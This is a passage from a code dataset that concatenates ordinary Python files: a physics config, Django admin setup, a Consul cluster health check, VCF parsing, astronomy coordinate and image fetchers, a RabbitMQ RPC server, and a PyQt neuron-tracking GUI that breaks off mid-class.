content
stringlengths 5
1.05M
|
|---|
import FWCore.ParameterSet.Config as cms
from L1Trigger.TrackTrigger.ProducerSetup_cfi import TrackTrigger_params
# Register the tt::ProducerSetup ESProducer, configured with the shared
# TrackTrigger parameter set imported above.
TrackTriggerSetup = cms.ESProducer("tt::ProducerSetup", TrackTrigger_params)
|
from django.contrib import admin
# Register your models here.
from .models import UserInfo, Owns, Balance, Ticket
# Expose the account/ownership/balance/ticket models in the Django admin UI
# (default ModelAdmin; no custom admin classes).
admin.site.register(UserInfo)
admin.site.register(Owns)
admin.site.register(Balance)
admin.site.register(Ticket)
|
#!/usr/bin/env python2
from __future__ import print_function
import sys
import json
import base64
from time import sleep
import urllib2
import ssl
import subprocess
def get_credentials():
    """Read the Consul API password out of ``security.yml``.

    Returns ``"admin:<password>"`` on success, or ``""`` when the file is
    missing *or* the key is absent.  (Previously the key-absent path fell off
    the end of the function and returned ``None`` implicitly, which would
    crash the ``b64encode`` call downstream.)
    """
    # TODO: is this the correct YAML key for the Consul API password?
    yaml_key = "nginx_admin_password:"
    try:
        with open('security.yml') as f:
            for line in f:
                if yaml_key in line:
                    # credentials are the whole string after the key
                    return "admin:" + line[len(yaml_key):].strip()
    except IOError:
        pass
    # Returning "" ensures that unit tests will run network code, rather
    # than just failing because security.yml isn't present (or lacks the key).
    return ""
def get_hosts_from_json(json_str, role="control"):
    """Get a list of IP addresses of hosts with a certain role from a JSON
    string (Ansible dynamic-inventory format: ``_meta.hostvars``).

    :param json_str: inventory JSON produced by e.g. terraform.py --list
    :param role: lower-case role to match against each host's "role" var
    :return: list of the matching hosts' "public_ipv4" values
    """
    ips = []
    json_dic = json.loads(json_str)
    host_data = json_dic["_meta"]["hostvars"]
    # .items() instead of the Python-2-only .iteritems(); works on 2 and 3
    for key, dic in host_data.items():
        if dic.get("role", "").lower() == role:
            ips.append(dic["public_ipv4"])
    return ips
def get_hosts_from_dynamic_inventory(cmd, role="control"):
    """Get a list of IP addresses of hosts with the given role by running a
    dynamic inventory script such as terraform.py.

    :param cmd: argv list for subprocess (e.g. ["python2", "terraform.py", "--list"])
    :param role: role to filter on; forwarded to get_hosts_from_json
    :return: list of IPs, or [] when the script exits non-zero
    """
    proc = subprocess.Popen(cmd, stdout=subprocess.PIPE)
    rc = proc.wait()
    if rc != 0:
        print("terraform.py exited with ", rc)
        return []
    # BUG FIX: the role argument was previously dropped here, so callers
    # always got "control" hosts regardless of what they asked for.
    return get_hosts_from_json(proc.stdout.read(), role)
def node_health_check(node_address):
    """Return a boolean: whether a node passes all of its Consul health checks.

    Queries ``https://<node>/consul/v1/health/state/any`` with HTTP basic auth
    and reports the first non-passing check (if any) to stdout.
    """
    # Create a context that doesn't validate SSL certificates, since Mantl's
    # are self-signed.
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    url = "https://" + node_address + "/consul/v1/health/state/any"
    request = urllib2.Request(url)
    # NOTE(review): b64encode(str) only works on Python 2 (this script targets
    # python2 per the shebang/urllib2).  get_credentials() may legitimately
    # return "" -> header becomes just "Basic <b64 of empty>".
    auth = b'Basic ' + base64.b64encode(get_credentials())
    request.add_header("Authorization", auth)
    try:
        # 30-second timeout; cert-validation-free context from above
        f = urllib2.urlopen(request, None, 30, context=ctx)
        health_checks = json.loads(f.read().decode('utf8'))
        for check in health_checks:
            if check['Status'] != "passing":
                # report the first failing/warning check and bail out
                print(check['Name'] + ": " + check['Status'])
                return False
    except Exception as e:
        # any network / auth / parse problem counts as a failed node
        print("Check at IP ", node_address, " exited with this error\n", e)
        return False
    return True
def cluster_health_check(ip_addresses):
    """Run node_health_check on every address and return how many failed.

    :param ip_addresses: iterable of node IP address strings
    :return: integer count of nodes that did not pass all health checks
    """
    n_failed = 0
    for address in ip_addresses:
        ok = node_health_check(address)
        print("Node ", address, " ", "passed" if ok else "failed")
        if not ok:
            n_failed += 1
    return n_failed
if __name__ == "__main__":
print("Waiting for cluster to finalize init before starting health checks")
sleep(60*2) # two minutes
# Get IP addresses of hosts from a dynamic inventory script
cmd = ["python2", "plugins/inventory/terraform.py", "--list"]
address_list = get_hosts_from_dynamic_inventory(cmd)
if len(address_list) == 0:
print("terraform.py reported no control hosts.")
sys.exit(1)
failed = cluster_health_check(address_list)
sys.exit(0 if failed == 0 else 1)
|
# Utils for dealing with VCF generated by nextstrain.py, with a particular style of ID
# and clades appearing in genotypes...
from collections import defaultdict
def readVcfSampleClades(vcfFile):
    """Read VCF sample IDs from the #CHROM line, and parse out clades from the
    first data row's genotype columns.

    Genotype columns are expected to look like ``<gt>:<clade>``.

    :param vcfFile: path to the VCF file
    :return: (samples, sampleClades) where samples is the list of sample IDs
             from the #CHROM header and sampleClades maps sample -> clade
    """
    samples = []
    sampleClades = defaultdict()
    with open(vcfFile, 'r') as vcfF:
        line = vcfF.readline().strip()
        while line:
            if line.startswith('#CHROM'):
                # header row: sample IDs start at the 10th tab-separated column
                samples = line.split('\t')[9:]
            elif not line.startswith('#'):
                gts = line.split('\t')[9:]
                if len(gts) != len(samples):
                    # die() is a project helper defined elsewhere -- TODO confirm
                    die("VCF file '%s' has %d samples but %d genotypes in first row" %
                        (vcfFile, len(samples), len(gts)))
                for sample, gt in zip(samples, gts):
                    # genotype value before the ':' is not needed here
                    _gtVal, clade = gt.split(':')
                    sampleClades[sample] = clade
                # only the first data row is needed for clades
                break
            line = vcfF.readline().strip()
    # (removed the redundant vcfF.close(); the with-block closes the file)
    return samples, sampleClades
|
from astropy.coordinates import jparser
from io import BytesIO
import urllib.request
import logging
import re
from pathlib import Path
import numbers
import numpy as np
from astropy.io import fits
from astropy.time import Time
from astropy.coordinates import SkyCoord, EarthLocation, UnknownSiteException
from astropy.coordinates.name_resolve import NameResolveError
from recipes import caches
# from motley.profiling.timers import timer
from recipes.logging import get_module_logger
# module level logger
logger = get_module_logger()
logging.basicConfig()
# persistent caches for faster object coordinate and image retrieval
cachePath = Path.home() / '.cache/obstools'  # NOTE only for linux!
cooCachePath = cachePath / 'coords.pkl'      # resolved object coordinates
siteCachePath = cachePath / 'sites.pkl'      # EarthLocation site lookups
dssCachePath = cachePath / 'dss.pkl'         # downloaded DSS images
skyCachePath = cachePath / 'skymapper.pkl'   # downloaded SkyMapper images
# Matches an HTML error payload (bytes) in a DSS server response; group 1 is
# the text inside the <PRE> block.
RGX_DSS_ERROR = re.compile(br'(?s)(?i:error).+?<PRE>\s*(.+)\s*</PRE>')
def int2tup(v):
    """Return *v* as a tuple, wrapping a bare integer as a 1-tuple."""
    return (v,) if isinstance(v, numbers.Integral) else tuple(v)
@caches.to_file(siteCachePath)
def get_site(name):
    """Resolve a site name to an `EarthLocation`, caching results to disk.

    :param name: site name string, or an EarthLocation (returned unchanged)
    :return: astropy.coordinates.EarthLocation
    """
    if isinstance(name, EarthLocation):
        return name
    try:
        # first try astropy's registry of known observatory sites
        return EarthLocation.of_site(name)
    except UnknownSiteException:
        pass
    # try resolve as an address. NOTE this will almost always return a
    # location, even for something that is obviously crap like 'Foo' or 'Moo'
    loc = EarthLocation.of_address(name)
    loc.info.name = name
    return loc
# if raises is warns is silent is None:
# raises = True # default behaviour : raise TypeError
# if raises:
# emit = bork(TypeError)
# elif warns:
# emit = warnings.warn
# elif silent:
# emit = _echo # silently ignore
# emit=bork(TypeError)
def get_coordinates(name_or_coords):
    """
    Get object coordinates from object name or string of coordinates. If the
    coordinates could not be resolved, return None

    Parameters
    ----------
    name_or_coords : str or SkyCoord, optional
        The object name or coordinates (right ascention, declination) as a str
        that be resolved by SkyCoord, or a SkyCoord object.

    Returns
    -------
    astropy.coordinates.SkyCoord or None
    """
    if isinstance(name_or_coords, SkyCoord):
        return name_or_coords
    try:
        # first try interpret coords.
        if len(name_or_coords) == 2:
            # a 2-tuple. hopefully ra, dec
            # NOTE(review): a 2-*character* string also lands here and gets
            # star-unpacked into its characters -- confirm intended
            return SkyCoord(*name_or_coords, unit=('h', 'deg'))
        # might also be a single coordinate string
        # eg. '06:14:51.7 -27:25:35.5'
        return SkyCoord(name_or_coords, unit=('h', 'deg'))
    except ValueError:  # as err:
        # not parseable as coordinates; fall back to name resolution
        return get_coords_named(name_or_coords)
def get_coords_named(name):
    """
    Attempts to retrieve coordinates from name, first by parsing the name, or by
    doing SIMBAD Sesame query for the coordinates associated with name.
    Returns None (implicitly) when the lookup fails.

    Parameters
    ----------
    name : str
        The object name

    Examples
    --------
    >>> get_coords_named('MASTER J061451.7-272535.5')
    >>> get_coords_named('UZ For')
    """
    try:
        coo = resolver(name)
    except NameResolveError as err:  # AttributeError
        # lookup failed -> log and fall through, returning None
        logger.warning(
            'Coordinates for object %r could not be retrieved due to the '
            'following exception: \n%s', name, str(err))
    else:
        if isinstance(coo, SkyCoord):
            logger.info(
                'The following ICRS J2000.0 coordinates were retrieved:\n'
                + ra_dec_string(coo, precision=2, sep=' ', pad=1)
            )
        return coo
@caches.to_file(cooCachePath)
def resolver(name):
    """
    Get the target coordinates from object name if known. This function is
    decorated with the `memoize.to_file` decorator, which caches all previous
    database lookups. This allows offline usage for repeat queries of the same
    name while also offering a performance improvement for this case.

    Parameters
    ----------
    name : str
        object name

    Returns
    -------
    coords: astropy.coordinates.SkyCoord or None
        None when the name is definitively unresolvable (cached, too).
    """
    # try parse J coordinates from name. We do this first, since it is
    # faster than a sesame query
    try:  # EAFP
        return jparser.to_skycoord(name)
    except ValueError as err:
        logger.debug('Could not parse coordinates from name %r.', name)
    try:
        # Attempts a SIMBAD Sesame query with the given object name
        logger.info('Querying SIMBAD database for %r.', name)
        return SkyCoord.from_name(name)
    except NameResolveError as err:
        # check if the name is bad - something like "FLAT" or "BIAS", we want
        # to cache these bad values also to avoid multiple sesame queries for
        # bad values like these
        if str(err).startswith("Unable to find coordinates for name"):
            return None
        # If we are here, it probably means there is something wrong with the
        # connection:
        # NameResolveError: "All Sesame queries failed."
        raise
def convert_skycoords(ra, dec):
    """Try to convert ra, dec to a SkyCoord.

    :param ra: right ascension (hour-angle value/string accepted by SkyCoord)
    :param dec: declination (degrees value/string)
    :return: SkyCoord, or None (implicitly) when inputs are empty/unparsable
    """
    if ra and dec:
        try:
            return SkyCoord(ra=ra, dec=dec, unit=('h', 'deg'))
        except ValueError:
            # lazy %-style logger args (consistent with the rest of this
            # module; avoids formatting when the warning is filtered out)
            logger.warning(
                'Could not interpret coordinates: %s; %s', ra, dec)
def retrieve_coords_ra_dec(name, verbose=True, **fmt):
    """Return SkyCoord plus string representations of ra and dec.

    :param name: object name to resolve via get_coords_named
    :param verbose: unused here; kept for backward compatibility
    :param fmt: formatting overrides for `Angle.to_string`
    :return: (coords, ra_str, dec_str), or (None, None, None) if unresolved
    """
    coords = get_coords_named(name)
    if coords is None:
        return None, None, None
    # BUG FIX: previously `fmt.update(default_fmt)` let the defaults clobber
    # caller-supplied formatting.  Defaults now only fill in missing keys,
    # consistent with ra_dec_string below.
    default_fmt = dict(precision=2, sep=' ', pad=1)
    default_fmt.update(fmt)
    fmt = default_fmt
    ra = coords.ra.to_string(unit='h', **fmt)
    dec = coords.dec.to_string(unit='deg', alwayssign=1, **fmt)
    return coords, ra, dec
def ra_dec_string(coords, **kws):
    """Format *coords* as 'α = <ra>; δ = <dec>' (caller kwargs override the
    default precision/sep/pad formatting)."""
    opts = dict(precision=2, sep=' ', pad=1)
    opts.update(**kws)
    ra_str = coords.ra.to_string(unit='h', **opts)
    dec_str = coords.dec.to_string(unit='deg', alwayssign=1, **opts)
    return 'α = %s; δ = %s' % (ra_str, dec_str)
def get_skymapper_table(coords, bands, size=(10, 10)):
    """Query the SkyMapper DR1 SIAP service for images covering *coords*.

    :param coords: SkyCoord position of interest
    :param bands: string of band letters, subset of 'uvgriz' (case-insensitive)
    :param size: field-of-view (arcmin, arcmin) -- converted to degrees below
    :return: (columns, data) -- the TSV header fields (bytes) and the rows as
             a numpy array of bytes
    """
    # http://skymapper.anu.edu.au/about-skymapper/
    # http://skymapper.anu.edu.au/how-to-access/#public_cutout
    url = 'http://api.skymapper.nci.org.au/public/siap/dr1/query?'
    bands = set(bands.lower())
    # every requested band must be one of the SkyMapper filters
    assert not (bands - set('uvgriz'))
    # encode payload for the php form
    # NOTE(review): urllib.parse is reachable via the `import urllib.request`
    # at the top of the file only because urllib.request imports it -- confirm
    params = urllib.parse.urlencode(
        dict(POS=coords.to_string().replace(' ', ','),
             BAND=','.join(bands),
             SIZE=','.join(np.divide(size, 60).astype(str)),  # arcmin -> deg
             VERB=0,  # verbosity for the table
             INTERSECT='covers',
             RESPONSEFORMAT='TSV',
             )).encode()
    # submit the form
    # req = urllib.request.Request(url)
    raw = urllib.request.urlopen(url, params).read()
    # first TSV row is the column names; drop the trailing empty line
    columns, *data = (l.split(b'\t') for l in raw.split(b'\n')[:-1])
    data = np.array(data)
    t = Time(data[:, columns.index(b'mjd_obs')].astype(str), format='mjd')
    logger.info('Found %i %s-band SkyMapper DR1 images for coordinates %s '
                'spanning dates %s to %s',
                len(data), bands,
                ra_dec_string(coords, precision=2, sep=' ', pad=1),
                t.min().iso.split()[0], t.max().iso.split()[0])
    return columns, data
def get_skymapper(coords, bands, size=(10, 10), combine=True,
                  most_recent_only=False):
    """
    Get combined sky-mapper image.

    :param coords: SkyCoord position of interest
    :param bands: band letters, subset of 'uvgriz'
    :param size: field-of-view in arcmin
    :param combine: NOTE(review): accepted but never used below -- confirm
    :param most_recent_only: if True, only download the image with the
        smallest mjd_obs (NOTE(review): argmin picks the *earliest* epoch;
        the name suggests the latest was intended -- confirm)
    :return: list of HDULists, one per downloaded image
    """
    columns, data = get_skymapper_table(coords, bands, size)
    urls = data[:, columns.index(b'get_fits')].astype(str)
    if most_recent_only:
        t = data[:, columns.index(b'mjd_obs')].astype(float)
        urls = [urls[t.argmin()]]
    # retrieve data possibly from cache
    logger.info('Retrieving images...')
    hdus = [_get_skymapper(url) for url in urls]
    return hdus
@caches.to_file(skyCachePath)  # memoize for performance
def _get_skymapper(url):
    """Download one SkyMapper FITS image and return it as an HDUList
    (results cached to disk by the decorator)."""
    # get raw image data
    logger.debug(f'Reading data from {url=}')
    raw = urllib.request.urlopen(url).read()
    # load into fits via an in-memory buffer (no temp file)
    fitsData = BytesIO()
    fitsData.write(raw)
    fitsData.seek(0)
    return fits.open(fitsData, ignore_missing_end=True)
# @timer
@caches.to_file(dssCachePath)  # memoize for performance
def get_dss(server, ra, dec, size=(10, 10), epoch=2000):
    """
    Grab a image from STScI server and load as HDUList.
    See [survey description]_.

    Parameters
    ----------
    server : str
        one of the DSS survey identifiers in `known_servers` below
    ra, dec :
        coordinates, passed straight to the form's r/d fields
    size : 2-tuple
        Field of view size in 'arcmin'
    epoch : int
        coordinate epoch, encoded as e.g. 'J2000'

    Returns
    -------
    `astropy.io.fits.hdu.HDUList`

    Raises
    ------
    ValueError for an unknown server; STScIServerError when the server
    responds with an error page instead of FITS data.

    `survey description: <http://gsss.stsci.edu/SkySurveys/DSS%20Description.htm>`_
    """
    # , urllib.error, urllib.parse
    # see: http://gsss.stsci.edu/SkySurveys/Surveys.htm
    known_servers = ('all',
                     'poss2ukstu_blue',
                     'poss1_blue',
                     'poss2ukstu_red',
                     'poss1_red',
                     'poss2ukstu_ir',
                     'quickv'
                     )  # TODO: module scope ?
    if not server in known_servers:
        raise ValueError('Unknown server: %s. Please select from: %s'
                         % (server, str(known_servers)))
    # resolve size
    h, w = size  # FIXME: if number -- a bare number here would fail to unpack
    # make url
    url = 'https://archive.stsci.edu/cgi-bin/dss_search?'
    # encode payload for the php form
    params = urllib.parse.urlencode(
        dict(v=server,
             r=ra, d=dec,
             e=f'J{epoch}',
             h=h, w=w,
             f='fits',
             c='none')).encode()
    # submit the form
    with urllib.request.urlopen(url, params) as html:
        raw = html.read()
    # parse error message from the (HTML) response, if any
    error = RGX_DSS_ERROR.search(raw)
    if error:
        raise STScIServerError(error[1])
    # log
    logger.info("Retrieving %s'x %s' image for object at J%.1f coordinates "
                "RA = %.3f; DEC = %.3f from %r", h, w, epoch, ra, dec, server)
    # load into fits via an in-memory buffer
    fitsData = BytesIO()
    fitsData.write(raw)
    fitsData.seek(0)
    return fits.open(fitsData, ignore_missing_end=True)
class STScIServerError(Exception):
    """Raised when the STScI DSS server returns an error page instead of
    FITS data."""
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import pika
# Explicit credentials; without them pika defaults to user=guest, password=guest
credentials = pika.PlainCredentials(username="admin", password="123")
# Build the (blocking) connection object
connection = pika.BlockingConnection(
    pika.ConnectionParameters(
        host="192.168.1.100",     # broker IP
        port=5672,                # AMQP port
        virtual_host="/test",     # virtual host
        credentials=credentials,  # login credentials
    ))
# open a channel on the connection
channel = connection.channel()
# declare the queue this RPC server consumes requests from
channel.queue_declare(queue='rpc_queue')
# Fibonacci function
def fib(n):
    """Return the n-th Fibonacci number (fib(0)=0, fib(1)=1).

    Iterative O(n) replacement for the original naive recursion, which was
    O(2^n) and would stall this single-threaded RPC worker for moderate n.
    """
    a, b = 0, 1
    for _ in range(n):
        a, b = b, a + b
    return a
# Callback invoked for each message arriving on 'rpc_queue'
def on_request(ch, method, props, body):
    """Handle one RPC request: parse n from the message body, compute fib(n)
    and publish the result back to the client's reply_to queue."""
    # parse the request body into an int
    n = int(body)
    """
    服务端和客户端,通过ch.basic_publish
    互相
    """
    # echo the value received from the client
    print("得到值:", str(n))
    # compute the Fibonacci number
    response = fib(n)
    # send the answer back to the client (reply_to / correlation_id pattern)
    ch.basic_publish(
        exchange='',
        routing_key=props.reply_to,
        properties=pika.BasicProperties(correlation_id=props.correlation_id),
        body=str(response))
    # manual message acknowledgement
    ch.basic_ack(delivery_tag=method.delivery_tag)
"""
您可能已经注意到调度仍然不能完全按照我们的意愿工作。例如,在有两个工人的情况下,当所有奇数消息很重而偶数消息都很轻时,一个工人将一直很忙,另一个工人几乎不做任何工作。好吧,RabbitMQ 对此一无所知,仍然会均匀地发送消息。
发生这种情况是因为 RabbitMQ 只是在消息进入队列时分派消息。
它不查看消费者未确认消息的数量。它只是盲目地将第 n 个消息发送给第 n 个消费者。
为了解决这个问题,我们可以使用带有prefetch_count=1设置的Channel#basic_qos通道方法 。
相反,它将把它分派给下一个不忙的工人.
除了改变channel的调度计划外
1.加入更多的消费者
2.使用消息TTL(生存时间和到期时间,消息时效性)
"""
channel.basic_qos(prefetch_count=1)
# 信道接收
channel.basic_consume(queue='rpc_queue', on_message_callback=on_request)
print("服务端启动")
# 开始阻塞
channel.start_consuming()
|
from PyQt5 import QtGui
from PyQt5.QtWidgets import *
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QPainter
from PyQt5.QtCore import QRect, QPoint, Qt
from pyqtgraph.parametertree import Parameter, ParameterTree
from ..helpers import QtHelpers
from ..parameters.parameters import Parameters
from typing import Dict
import numpy as np
#CFP added for integration
from src.methods import tracking_methods
from multiprocessing import Process,Pipe
class NeuronBar(QScrollArea):
    """
    This is the bar at the top, with the list of identified neurons and the key assigned to them.

    Neurons with an assigned key are shown in the "activated" layout (left of
    the '|' separator); all others in the "unactivated" layout (right of it).
    Registers itself as a client of several controller notification lists.
    """
    def __init__(self, controller, reserved_keys=None):
        """
        :param controller: main controller to report to
        :param reserved_keys: keys that may not be assigned as neuron keys (they are used by main gui as specific commands)
        """
        super().__init__()
        self.controller = controller
        # subscribe to the controller's change notifications
        self.controller.neuron_keys_registered_clients.append(self)
        self.controller.nb_neuron_registered_clients.append(self)
        self.controller.present_neurons_registered_clients.append(self)
        self.controller.highlighted_neuron_registered_clients.append(self)
        if reserved_keys is None:
            reserved_keys = []
        self.reserved_keys = reserved_keys
        # a holder, not displayed, to keep alive the widgets removed from other layouts
        self.removed_holder = QWidget()
        self.setWidgetResizable(True)
        dummy = QWidget()
        self.neuron_bar_holderLayout = QHBoxLayout()
        # visual separator between keyed ("activated") and unkeyed neurons
        self.separator = QLabel("|")
        self.unactivated_contents = QGridLayout()
        self.activated_contents = QGridLayout()
        self.neuron_bar_holderLayout.addLayout(self.activated_contents)
        self.neuron_bar_holderLayout.addWidget(self.separator)
        self.neuron_bar_holderLayout.addLayout(self.unactivated_contents)
        dummy.setLayout(self.neuron_bar_holderLayout)
        self.setWidget(dummy)
        # neuron_idx_from1 -> NeuronBarItem
        self.neurons = {}
        # set of neurons that have a key displayed
        self.keyed_neurons_from1 = set()
        self.setContentsMargins(0, 0, 0, 0)
        self.neuron_bar_holderLayout.setSpacing(0)

    def change_neuron_keys(self, changes: list):
        """
        Changes (or sets if no previously existing, or deletes if key not given) the keys displayed for given neurons.
        :param changes: list of (neuron_idx_from1, new_key). For each such pair, new_key will be displayed instead of
            previous display for the neuron neuron_idx_from1. If the key is None, then no key will be displayed.
        """
        for neuron_idx_from1, key in changes:
            if key is None:
                # blank out the key button and drop from the keyed set
                self.neurons[neuron_idx_from1].set_text(" ")
                self.keyed_neurons_from1.discard(neuron_idx_from1)
            else:
                self.neurons[neuron_idx_from1].set_text(key)
                self.keyed_neurons_from1.add(neuron_idx_from1)
        # re-sort neurons between the activated/unactivated layouts
        self._restore_activated_neurons()

    def _restore_activated_neurons(self):
        """
        Re-creates the activated_neuron_bar_contents (a bar with only the neurons that have a key assigned??)
        """
        # First remove all buttons from the layouts
        for lay in [self.activated_contents, self.unactivated_contents]:
            # iterate backwards so removals don't shift remaining indices
            for i in range(lay.count() - 1, -1, -1):
                item = lay.itemAt(i)
                if item.widget() is not None:
                    # reparent to the hidden holder to keep the widget alive
                    item.widget().setParent(self.removed_holder)  # or lay.removeItem(item) would be enough?
        # Then put every button in the right layout (activated or inactivated)
        for i_from1 in sorted(self.neurons.keys()):
            if i_from1 in self.keyed_neurons_from1:
                self.neurons[i_from1].install_in(self.activated_contents)
            else:
                self.neurons[i_from1].install_in(self.unactivated_contents)

    def change_nb_neurons(self, nb_neurons):
        """
        Changes the number of neurons in the neuron bar.
        :param nb_neurons: new number of neurons
        """
        old_n_neurons = len(self.neurons)
        if nb_neurons > old_n_neurons:
            # grow: create and install the new trailing items
            for i_from1 in range(old_n_neurons + 1, nb_neurons + 1):
                self.neurons[i_from1] = NeuronBarItem(i_from1, self)
                self.neurons[i_from1].install_in(self.unactivated_contents)
        elif nb_neurons < old_n_neurons:
            # shrink: delete the trailing items
            for i_from1 in range(nb_neurons + 1, old_n_neurons + 1):
                self.neurons[i_from1].delete()
                del self.neurons[i_from1]
        self._restore_activated_neurons()

    def _make_user_neuron_key(self, neuron_id_from1):
        """
        Returns a closure that asks the user a key to assign to neuron neuron_id_from1 and notifies self.controller.
        (Used as a button-click callback.)
        """
        def fun():
            text, ok = QInputDialog.getText(self, 'Select key for neuron ' + str(neuron_id_from1), 'Key: ')
            # Todo AD: should the parent not be the main gui rather than self??
            if not ok:
                return
            if len(text) == 0:
                # empty input clears the key
                text = None
            elif len(text) != 1 or (text in self.reserved_keys):
                # only single, non-reserved characters are valid keys
                errdial = QErrorMessage()
                errdial.showMessage('Invalid key')
                errdial.exec_()
                return
            self.controller.assign_neuron_key(neuron_id_from1, text)
        return fun

    def _make_neuron_highlight(self, i_from1):
        # closure factory: click callback that highlights neuron i_from1
        def fun():
            self.controller.highlight_neuron(i_from1)
        return fun

    def change_present_neurons(self, present=None, added=None, removed=None):
        """
        Changes which of the neurons are present in current frame, as their corresponding buttons should be colored
        in blue instead of red.
        :param present: which neuron indices (from 1) are present, if given
        :param added: single neuron index (from 1) that was added, if given
        :param removed: single neuron index (from 1) that was removed, if given
        """
        # todo: don't reset all style sheet of all neurons every time?
        if present is not None:
            # full refresh: color every neuron by membership in `present`
            for i_from1, neu in self.neurons.items():
                if i_from1 in present:
                    neu.set_present()
                else:
                    neu.set_absent()
            return
        # incremental update
        if added is not None:
            self.neurons[added].set_present()
        if removed is not None:
            self.neurons[removed].set_absent()

    def change_highlighted_neuron(self, high: int = None, unhigh: int = None,
                                  **kwargs):
        """
        Highlights or unhighlights neuron buttons.
        :param high: neuron id (from 1), will be highlighted if given
        :param unhigh: neuron id (from 1), will be unhighlighted if given
        """
        if high is not None:
            self.neurons[high].highlight()
        if unhigh is not None:
            self.neurons[unhigh].unhighlight()
class NeuronBarItem:
    """
    This is one neuron in the neuron bar. It contains the colored button with the neuron id (from1), and the key button.

    Button color encodes state via the dynamic "color" property:
    "a" = absent (red), "p" = present (blue), "hp" = highlighted+present
    (green), "ha" = highlighted+absent (orange).
    """
    qss = """
    QPushButton{
    height: 10px;
    min-height: 10px;
    width: 10px;
    min-width: 40px;
    }
    QPushButton[color = "a"]{
    background-color: red;
    }
    QPushButton[color = "p"]{
    background-color: blue;
    }
    QPushButton[color = "hp"]{
    background-color: green;
    }
    QPushButton[color = "ha"]{
    background-color: orange;
    }
    """
    # Could also have: border-radius: 4px;

    def __init__(self, i_from1, parent):
        super().__init__()
        self.i_from1 = i_from1
        self.parent = parent
        # small button showing the key assigned to this neuron (blank = none)
        self.neuron_key_button = QPushButton(" ")
        self.neuron_key_button.setStyleSheet(self.qss)
        self.neuron_key_button.clicked.connect(self.parent._make_user_neuron_key(self.i_from1))
        # colored button labeled with the neuron index
        self.neuron_button = QPushButton(str(self.i_from1))
        self.neuron_button.setStyleSheet(self.qss)  # TODO set correct color NOW??
        self.neuron_button.clicked.connect(self.parent._make_neuron_highlight(self.i_from1))
        self.present = False  # Todo: set at init??
        self.highlighted = False  # Todo: set at init??

    def install_in(self, holder_layout):
        """Append this item's two buttons as the next column of holder_layout."""
        j = holder_layout.count() // 2  # this is the number of items already in the layout; there are two per neuron
        # already installed (the button and the key button). We add self after the neurons already present.
        holder_layout.addWidget(self.neuron_key_button, 0, j)
        holder_layout.addWidget(self.neuron_button, 1, j)

    def set_present(self):
        # present in current frame: blue, or green when also highlighted
        self.present = True
        if self.highlighted:
            self.neuron_button.setProperty("color", "hp")
        else:
            self.neuron_button.setProperty("color", "p")
        self.neuron_button.setStyle(self.neuron_button.style())  # for some reason this is needed to actually change the color

    def set_absent(self):
        # absent from current frame: red, or orange when also highlighted
        self.present = False
        if self.highlighted:
            self.neuron_button.setProperty("color", "ha")
        else:
            self.neuron_button.setProperty("color", "a")
        self.neuron_button.setStyle(self.neuron_button.style())  # for some reason this is needed to actually change the color

    def highlight(self):
        # mark as highlighted; color depends on presence
        self.highlighted = True
        if self.present:
            self.neuron_button.setProperty("color", "hp")
        else:
            self.neuron_button.setProperty("color", "ha")
        self.neuron_button.setStyle(self.neuron_button.style())  # for some reason this is needed to actually change the color

    def unhighlight(self):
        # clear the highlight; color depends on presence
        self.highlighted = False
        if self.present:
            self.neuron_button.setProperty("color", "p")
        else:
            self.neuron_button.setProperty("color", "a")
        self.neuron_button.setStyle(self.neuron_button.style())  # for some reason this is needed to actually change the color

    def set_text(self, text):
        # display `text` on the key button
        self.neuron_key_button.setText(text)

    def delete(self):
        # detach both buttons from their layouts so Qt can dispose of them
        self.neuron_key_button.setParent(None)
        self.neuron_button.setParent(None)
        del self  # NOTE(review): `del self` only unbinds the local name; it has no effect on the object
class DashboardItem(QPushButton):
    """A colored dashboard button for one neuron: red ("a") = absent,
    blue ("p") = present. Clicking it triggers the supplied callback."""
    qss = """
    QPushButton{
    border-radius: 4px;
    }
    QPushButton[color = "a"]{
    background-color: red;
    }
    QPushButton[color = "p"]{
    background-color: blue;
    }
    """

    def __init__(self, i_from1, callback):
        super().__init__()
        self.i_from1 = i_from1
        self.clicked.connect(callback)
        self.present = False  # Todo: set at init??
        self.setStyleSheet(self.qss)

    def _apply_color(self, code):
        # Setting the dynamic property alone does not repaint; re-applying the
        # style forces the stylesheet to be re-evaluated with the new value.
        self.setProperty("color", code)
        self.setStyle(self.style())

    def set_present(self):
        """Color the button blue (neuron present in the current frame)."""
        self.present = True
        self._apply_color("p")

    def set_absent(self):
        """Color the button red (neuron absent from the current frame)."""
        self.present = False
        self._apply_color("a")
class ViewTab(QScrollArea):
    """
    This is the tab that controls viewing parameters.

    Builds a column of checkboxes/sliders wired to the controller and the
    controlled plot. The lower half of the tab differs depending on whether
    the data is point-based (point overlays, tracks, adjacent points) or
    mask-based (mask/alignment/crop overlays, blurring).
    """
    def __init__(self, controller, controlled_plot, default_values: Dict[str, bool]):
        """
        :param controller: main controller to report to
        :param controlled_plot: the instance of ImageRendering that is controlled by the commands in this tab
        :param default_values: dictionary (string->bool) for whether some check buttons should be checked.
            Should include "just_show_first_channel", "autolevels" and "overlay_mask_by_default".
        """
        super(ViewTab, self).__init__()
        self.controller = controller
        self.controlled_plot = controlled_plot
        # point-based vs mask-based data decides which controls are built below
        as_points = self.controller.point_data
        view_tab_grid = QGridLayout()
        row = 0
        # --- channel / autolevels checkboxes ---
        view_checkboxes_lay = QGridLayout()
        first_channel_only_checkbox = QCheckBox("Show only first channel")
        first_channel_only_checkbox.setChecked(int(default_values["just_show_first_channel"]))  # MB changed bool to int
        first_channel_only_checkbox.toggled.connect(self.controller.toggle_first_channel_only)
        view_checkboxes_lay.addWidget(first_channel_only_checkbox, 0, 0)
        second_channel_only_checkbox = QCheckBox("Show only second channel")
        # NOTE(review): a QCheckBox instance is always truthy, so this branch
        # always executes; was `default_values["just_show_first_channel"]` or
        # `.isChecked()` intended? -- confirm
        if first_channel_only_checkbox:
            second_channel_only_checkbox.setChecked(0)  # MB changed bool to int
        second_channel_only_checkbox.toggled.connect(self.controller.toggle_second_channel_only)
        view_checkboxes_lay.addWidget(second_channel_only_checkbox, 0, 1)
        autolevels_checkbox = QCheckBox("Autolevels")
        autolevels_checkbox.setChecked(int(self.controlled_plot.figure.autolevels))
        autolevels_checkbox.toggled.connect(self.controlled_plot.change_autolevels)
        view_checkboxes_lay.addWidget(autolevels_checkbox, 0, 2)
        view_tab_grid.addLayout(view_checkboxes_lay, row, 0)
